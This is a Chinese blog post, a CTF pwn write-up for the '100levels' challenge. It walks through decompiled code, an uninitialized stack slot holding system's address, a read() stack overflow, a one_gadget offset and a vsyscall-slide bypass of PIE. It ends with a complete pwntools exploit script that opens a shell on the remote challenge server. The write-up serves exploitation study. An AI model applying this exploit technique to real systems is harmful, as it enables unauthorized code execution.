CTF-PWN100levels(vsyscall利用)

最新推荐文章于 2025-02-06 11:58:33 发布
原创 最新推荐文章于 2025-02-06 11:58:33 发布 · 888 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入分析了一个Pwn挑战,详细解读了程序流程与漏洞,包括system地址泄露、控制流劫持及ROP链构造等关键步骤。通过调试和利用库函数偏移,成功实现了shell执行。

程序流程&漏洞分析

checksec:

supergate@ubuntu:~/Desktop/Pwn$ checksec pwn
[*] '/home/supergate/Desktop/Pwn/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

开启了PIE,这对我们的地址泄露造成困难

主要实现了两个流程:
Hint:

int hint()
{
  signed __int64 v1; // [rsp+8h] [rbp-108h]
  int v2; // [rsp+10h] [rbp-100h]
  __int16 v3; // [rsp+14h] [rbp-FCh]

  if ( unk_55C634EFB08C )
  {
    sprintf((char *)&v1, "Hint: %p\n", &system, &system);
  }
  else
  {
    v1 = 'N NWP ON';
    v2 = 'UF O';
    v3 = 'N';
  }
  return puts((const char *)&v1);
}

可以发现该流程先判断.bss段上的一个地方的值,如果不为零则可以达到泄露system地址的效果
当然在后续调试和分析中我们发现这个地方没有办法直接泄露,但是按tab看汇编后可以发现,system的地址会被直接存在栈上[esp+10h]的位置上,在后续的控制流中有可能进行利用

Go:

int go()
{
  int v1; // ST0C_4
  __int64 v2; // [rsp+0h] [rbp-120h]
  __int64 v3; // [rsp+0h] [rbp-120h]
  int v4; // [rsp+8h] [rbp-118h]
  __int64 System_addr; // [rsp+10h] [rbp-110h]
  signed __int64 System_addra; // [rsp+10h] [rbp-110h]
  signed __int64 v7; // [rsp+18h] [rbp-108h]
  __int64 v8; // [rsp+20h] [rbp-100h]

  puts("How many levels?");
  v2 = readin();
  if ( v2 > 0 )
    System_addr = v2;
  else
    puts("Coward");
  puts("Any more?");
  v3 = readin();
  System_addra = System_addr + v3;
  if ( System_addra > 0 )
  {
    if ( System_addra <= 99 )
    {
      v7 = System_addra;
    }
    else
    {
      puts("You are being a real man.");
      v7 = 100LL;
    }
    puts("Let's go!'");
    v4 = time(0LL);
    if ( (unsigned int)sub_55C634CF9E43(v7) != 0 )
    {
      v1 = time(0LL);
      sprintf((char *)&v8, "Great job! You finished %d levels in %d seconds\n", v7, (unsigned int)(v1 - v4), v3);
      puts((const char *)&v8);
    }
    else
    {
      puts("You failed.");
    }
    exit(0);
  }
  return puts("Coward Coward Coward Coward Coward");
}

可以看到有两个变量是改了名的——这就是上面分析时所说的可以利用的地方。根据栈平衡,本函数中的[esp+10h]的地址仍然存的是system的地址。v2<=0的时候会跳过对[esp+10h]的初始化,使得这个地方的值不变。
one_gadget搜一下库:

supergate@ubuntu:~/Desktop/Pwn$ one_gadget libc.so
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xef6c4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf0567 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

发现执行shell的地方存在libc.so偏移为0x4526a,因此可以通过go函数的v3变量来修改system_addr的偏移,使得[esp+10h]这个地址内存的是execve("/bin/sh")的地址

sub_55C634CF9E43

_BOOL8 __fastcall sub_55C634CF9E43(signed int a1)
{
  int v2; // eax
  __int64 v3; // rax
  __int64 buf; // [rsp+10h] [rbp-30h]
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]
  __int64 v7; // [rsp+28h] [rbp-18h]
  unsigned int v8; // [rsp+34h] [rbp-Ch]
  unsigned int v9; // [rsp+38h] [rbp-8h]
  unsigned int v10; // [rsp+3Ch] [rbp-4h]

  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  if ( !a1 )
    return 1LL;
  if ( (unsigned int)sub_55C634CF9E43(a1 - 1) == 0 )
    return 0LL;
  v10 = rand() % a1;
  v2 = rand();
  v9 = v2 % a1;
  v8 = v2 % a1 * v10;
  puts("====================================================");
  printf("Level %d\n", (unsigned int)a1);
  printf("Question: %d * %d = ? Answer:", v10, v9);
  read(0, &buf, 0x400uLL);
  v3 = strtol((const char *)&buf, 0LL, 10);
  return v3 == v8;
}

是一个递归调用函数。
很容易发现read函数有很大的缓冲区溢出量。
由于也没有canary,因此可以直接构造返回地址劫持控制流。
可以经过调试发现ret的地址在buf偏移0x38的地方,而上面提到的execve("/bin/sh"),由于存在[esp+10h]处,所以偏移处应该在0x38+8*3,因此在ret之后还应绕过剩下的这三个偏移。
由于开启了PIE,所以ROP链的构造比较困难,这里考虑使用vsyscall来跳过这三个地址,具体的原理可搜一下相关信息。

exp

from pwn import *
from LibcSearcher import *

context(log_level='debug')
#p=process("./pwn")
p=remote("111.198.29.45",48741)
e=ELF("./libc.so")

system_libc=e.symbols['system']
exev_libc=0x4526a
vsyscall=0xffffffffff600000
offset=exev_libc-system_libc
print "offset  ====> "+hex(offset)

p.recvuntil("Choice:\n")
p.sendline("2")

p.recvuntil("Choice:\n")
p.sendline("1")
p.recvuntil("How many levels?\n")
p.sendline("0")
p.recvuntil("Any more?\n")
p.sendline(str(offset))

for i in range(99):
    p.recvuntil("Question: ")
    a=int(p.recvuntil(" ")[:-1])
    p.recvuntil("* ")
    b=int(p.recvuntil(" ")[:-1])
    p.recvuntil("Answer:")
    p.sendline(str(a*b))

payload='a'*0x38+p64(vsyscall)*3
p.recvuntil("Answer:")
p.send(payload)
p.interactive()
CTF-PWN环境搭建手册
yuwoxinanA3的博客
11-17 4275
CTF-PWN方向必备解题环境
Linux tracing之内核vsyscall&vdso机制分析
tugouxp的专栏
06-27 1376
由于内核运行在受保护的地质空间上,Linux系统中的用户空间程序无法直接执行内核代码,不能直接调用内核空间中的函数,因此,应用程序以某种方式通知系统,告诉内核自己需要执行一function,希望系统系统切换到内核态,这样内核就可以代表应用程序在内核空间执行系统调用。这个道理就像机场的安检通道,旅客只能通过有限的几个通道进入,并且还要经过严格的安全检查。
xctf 100levels
doudoudedi
11-20 326
直接用vsyscall的地址不会发生改变通过栈的结构分布发现返回地址+24byte之后便是system_addr将其改为execve(’/bin/sh’)然后跳到上面即可 from pwn import * local=1 if local==1: p=process('./100levels') elf=ELF('./100levels') libc=ELF('./libc.so') el...
1000levels-vsyscall
playmaker的博客
08-11 402
1000levels-vsyscall 题目是一个64位的程序 具体保护如下 程序主要分为两部分,分别为go部分和hint部分。 首先先看简单的hint部分 int hint() { signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...
XCTF 3rd-BCTF-2017——100levels
05-08 459
64位程序,没开canary,但开了PIE  #爆破 #vsyscall 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 5 set(); 6 put_logo(); 7 while ( 1 ) ...
RE-CTF_100
iris的博客
10-11 1070
安装并打开apk之后,发现题目为爬到指定的楼层然后才能显示FLAG: 先使用JEB2反编译apk查看逻辑: 爬一层楼的点击事件:首先已爬楼层数+1并更新已爬楼层数,紧接着判断是否达到要爬楼层数,如果达到,就设置爬到了,看FLAG的点击结果为true。 最终看到FLAG按钮的点击事件,可以看到最终的返回FLAG方法在native层实现。我们可以使用IDA进行分析。 onCreate方法的实现...
vsyscall滑动利用
FUCKING12的博客
10-18 372
vsyscall滑动利用
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
精选资源
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
基于C语言的CTF-PWN方向入门课程《为缺少指导的同学而生》设计源码
02-07
本项目源码为CTF(Capture The Flag,夺旗赛)中的PWN(漏洞利用)方向提供了一个系统的入门课程。CTF是一种信息安全竞赛,参赛者需要解决各种信息安全问题,而PWN是其中的一个重要领域,主要涉及发现和利用软件中的...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTFCTF入门到精通,收藏这篇就够了
Cairo_A的博客
02-06 7574
CTF,即 Capture The Flag,中文名为夺旗赛,是一种网络安全技术人员之间进行技术竞技的比赛形式。在 CTF 比赛中,参赛者需要通过解决各种与网络安全相关的技术挑战来获取“旗帜”,这些挑战通常涵盖了多个领域的知识和技能,例如密码学、Web 安全、逆向工程、漏洞挖掘与利用、隐写术、二进制分析等等。比如说,在密码学相关的挑战中,可能需要参赛者破解加密的信息或算法来获取关键线索;Web 安全挑战可能要求找出网站存在的漏洞并加以利用;逆向工程则可能涉及对未知软件或程序的分析和理解。
攻防世界PWN1000levels题解
seaaseesa的博客
11-09 1192
1000levevls 本题是一个栈溢出题,难点在于开启了PIE,因此里面的函数地址是随机的。 溢出点在这里 让我们看看提示功能的函数 看看它的汇编代码 不管条件是否成立,system的地址都会保存到这个函数的rbp-110h处,也就是当前函数的栈顶。 我们再看看这个函数 我们进去看看 如果我们输入的levels大于0,v7才有初始化,那么,如果没有初始化,...
栈溢出技巧(上)
m0_59598029的博客
08-10 373
我们都知道由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用,后来各种绕过技术出现,比如return-to-plt、gotransomize)等的出现,PIE保护应运而生了。一般地都会把地址空间随机化和PIE混为一谈,没有详细地去了解过两者的区别(可能只有我没了解过,大佬们飘过即可),因为先来看一下两者的区别。
linux kernel pwn学习之劫持vdso
seaaseesa的博客
03-06 2658
Hijack vdso VDSO就是Virtual Dynamic Shared Object,是内核提供的虚拟的.so,这个.so文件不在磁盘上,而是在内核里头。内核把包含某.so的内存页在程序启动的时候映射入其内存空间,对应的程序就可以当普通的.so来使用里面的函数。Vdso里面封装了这几个函数,其作用主要是加快对于某些对速度要求很高的系统调用,更多详细信息可以查看https://blog....
栈溢出技巧-
蚁景网安学院
03-31 1263
ASLR和PIE我们都知道由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用,后来各种绕过技术出现,比如return-to-plt、got hijack、stack-...
CTF-PWN-pwn100 (ROP+DynELF定位system函数)
SuperGate的博客
09-24 833
漏洞分析 程序中只开了NX,查看程序逻辑发现: int sub_40068E() { char buf; // [rsp+0h] [rbp-40h] sub_40063D((__int64)&buf, 200); return puts("bye~"); } 使用sub_40063D函数向buf中读取200个字符,显然存在栈溢出。接下来我们要思考如何利用这个漏洞。 观察到程...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2605
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
VDSO与vsyscall
MillionSky的专栏
03-19 7626
1 概述vsyscall和vDSO是用于加速某些系统调用的两种机制。 传统的int 0x80有点慢, Intel和AMD分别实现了sysenter/sysexit和syscall/ sysret, 即所谓的快速系统调用指令, 使用它们更快, 但是也带来了兼容性的问题. 于是Linux实现了vsyscall, 程序统一调用vsyscall, 具体的选择由内核来决定. 而vsyscall的实现就在VD...
ctf-pwn怎么用write+read求libc的基址
最新发布
11-15
CTF Pwn中,通过`write`和`read`函数泄露libc基址是常见的利用技术,主要流程如下: #### 核心原理 1. **libc地址计算** libc基址 = 泄露的函数实际地址 - 该函数在libc中的固定偏移量 即:$libc\_base = ...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值